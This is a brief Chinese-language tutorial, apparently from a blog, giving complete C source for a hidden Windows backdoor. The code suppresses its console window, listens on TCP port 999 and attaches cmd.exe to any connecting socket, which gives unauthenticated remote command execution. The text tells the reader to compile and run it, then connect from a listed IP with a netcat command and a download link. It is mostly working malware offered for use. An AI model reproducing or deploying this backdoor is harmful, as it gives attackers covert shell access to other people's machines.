1.首先使用vc6编译器编译后门,并运行
代码语言:javascript复制#pragma comment(lib,"ws2_32.lib")
#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"" )
#endif
#include <winsock2.h>
#include <windows.h>
#define Port 999
int main()
{
SOCKET sSocket,cSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
WSADATA wsaData;
sockaddr_in sSockaddr;
char szCmdPath[MAX_PATH];
GetEnvironmentVariable("COMSPEC",szCmdPath,MAX_PATH);
ZeroMemory(&wsaData,sizeof(wsaData));
ZeroMemory(&si,sizeof(STARTUPINFO));
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
WSAStartup(0x0202,&wsaData);
cSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
sSockaddr.sin_addr.s_addr=INADDR_ANY;
sSockaddr.sin_family=AF_INET;
sSockaddr.sin_port=htons(Port);
bind(cSocket,(sockaddr*)&sSockaddr,sizeof(sSockaddr));
listen(cSocket,1);
int sLen=sizeof(sSockaddr);
sSocket=accept(cSocket,(sockaddr*)&sSockaddr,&sLen);
si.cb=sizeof(si);
si.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
si.hStdInput=(HANDLE)sSocket;
si.hStdOutput=(HANDLE)sSocket;
si.hStdError=(HANDLE)sSocket;
CreateProcess(NULL,szCmdPath,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);
WaitForSingleObject(pi.hProcess,INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
closesocket(cSocket);
closesocket(sSocket);
WSACleanup();
return 0;
}连接时使用nc工具链接即可 下载地址:https://eternallybored.org/misc/netcat/
nc执行命令 nc64.exe -t 192.168.1.12 999 即可链接到主机
